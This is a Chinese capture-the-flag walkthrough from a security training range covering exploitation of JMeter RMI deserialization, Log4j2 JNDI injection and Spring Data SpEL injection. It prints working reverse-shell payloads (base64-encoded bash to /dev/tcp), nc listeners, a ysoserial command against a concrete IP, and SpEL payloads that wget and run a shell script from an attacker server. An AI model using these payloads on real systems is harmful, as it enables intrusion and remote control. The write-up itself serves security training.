【揭秘三】练武靶场
“Ms08067专注网络安全技能培训 | 竞赛!“
号外号外,"Ms08067练武场" 最强劲的第三批选手打靶思路来啦。
官网链接:/
Jmeter RMI 反序列化命令执行漏洞
简介:
Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编写的用于压力测试和性能测 试的开源软件。其2.x版本和3.x版本中存在反序列化漏洞,攻击者可以利用该漏洞在目标服务器上执行 任意命令。
复现
利用ysoserial工具
;word =ysoserial
先在自己的vps起个监听
代码语言:txt复制nc -lvvp 7777然后将反弹shell命令加密
代码语言:txt复制bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC8xMjM0IDA+JjE=} |{base64,- d} |{bash,-i}最后利用ysoserial工具直接执行
代码语言:txt复制java -cp ysoserial-all.jar ysoserial.exploit.RMIRegistryExploit 27.25.151.24
20999 BeanShell1 'bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC8xMjM0IDA+JjE=} |{base64,-d} | {bash,-i}'查看反弹shell即可拿到flag
log4j2 远程代码执行漏洞复现(CVE-2021- 44228)
漏洞简介:
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该 工具将程序的输入输出信息进行日志记录。
2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。该漏洞是 由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶意请求,触发远程代码执行 漏洞,从而获得目标服务器权限。
在java中最常用的日志框架是log4j2和logback,其中log4j2支持lookup功能(查找搜索),这也是一个非常强大的功能,设计之初的目的也是为了方便开发者调用。
例如当开发者想在日志中打印今天的日期,则只需要输出{data:MM-dd-yyyy},此时log4j会将{}中包裹的内容单独处理,将它识别为日期查找,然后将该表达式替换为今天的日期内容输出为“08-22- 2022” ,这样做就不需要开发者自己去编写查找日期的代码。
表达式除了支持日期,还支持输出系统环境变量等功能,这样极大的方便了开发者。但是安全问题往往 就是因为“图方便”引起的,毕竟设计者也是需要在安全性和用户体验之间做个平衡。
其实打印日期,打印系统变量这种对系统而言构不成什么威胁,最终要的原因是log4j还支持JNDI协议。
漏洞适用版本
2.0 <= Apache log4j2 <= 2.14.1
访问:
利用JNDI注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 下载地址为: n/JNDI-Injection-Exploit/releases/tag/v1.0
代码语言:txt复制java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "想要执行的命令" -A "攻击机 的ip"本次在vps上利用反弹shell
代码语言:txt复制java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0OS4xMjgvNzc3NyAwPiYx} |{base64,-d} 起好之后,在vps再起一个监听
代码语言:txt复制nc -lvvp 9999将之前生成的连接进行尝试
经过测试,红框中的连接成功反弹shell env拿到flag
spring 代码执行 (CVE-2018-1273)
漏洞概述
SpringData是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达 式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。
影响范围
Spring Data Commons 1.13 – 1.13.10 (Ingalls SR10) Spring Data REST 2.6 – 2.6.10 (Ingalls SR10) Spring Data Commons 2.0 to 2.0.5 (Kay SR5) Spring Data REST 3.0 – 3.0.5 (Kay SR5)
访问页面
进行目录扫描发现有个users 目录,进行访问
然后利用burp抓包发送到重放模块。
再自己的vps中写一个反弹shell的脚本内容如下:
代码语言:txt复制bash -i >& /dev/tcp/vps地址/端口 0>&1修改burp抓包容将payload放入请求包中 paylaod1:
代码语言:txt复制username[#this.getClass().forName("java.lang.Runtime").getRuntime().
exec("wget /tmp http://vps地址/写好的反弹shell文件")]=&password=&repeatedPassword=发送后会显示500
然后再发送一个payload进行执行刚刚写入的shell payload2:
代码语言:txt复制username[#this.getClass().forName("java.lang.Runtime").getRuntime().
exec("bash /shell.sh")]=&password=&repeatedPassword=反弹shell成功即可读取flag
发布者:admin,转转请注明出处:http://www.yc00.com/web/1753563245a5053680.html
评论列表(0条)